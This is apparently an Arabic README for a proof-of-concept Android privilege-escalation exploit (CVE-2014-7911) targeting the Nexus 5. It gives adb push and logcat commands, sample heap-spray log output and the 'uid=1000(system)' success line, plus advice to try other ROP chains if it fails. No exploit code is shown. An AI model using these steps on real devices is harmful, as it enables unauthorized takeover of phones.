
استغلال لإثبات المفهوم لتصعيد الامتيازات المحلية في أندرويد (CVE-2014-7911) يستهدف Nexus5 باستخدام سلسلة ROP و heap spraying للحصول على uid النظام.
POC لـ CVE-2014-7911 لجهاز Nexus5 بنظام Android 4.4.4_r1 استنادًا إلى retme7، استخدم سلسلة rop مختلفة
#الاستخدام قم بتوصيل هاتفك عبر adb
adb push jni/expolit /data/local/tmp
adb logcat | grep auo_
قم بتشغيل هذا POC، انقر على زر “CVE-2014-7911”، سترى:
D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900
ثم قم بتصغير النشاط عدة مرات حتى يتعطل النظام، إذا رأيت:
D/auo_exploit(22665): uid=1000(system) gid=1000(system)
فقد نجح الاستغلال، إذا تعطل هاتفك فقط، فإن جهازك معرض للخطر وقد فشل الاستغلال (يجب أن تجد سلاسل ROP مختلفة).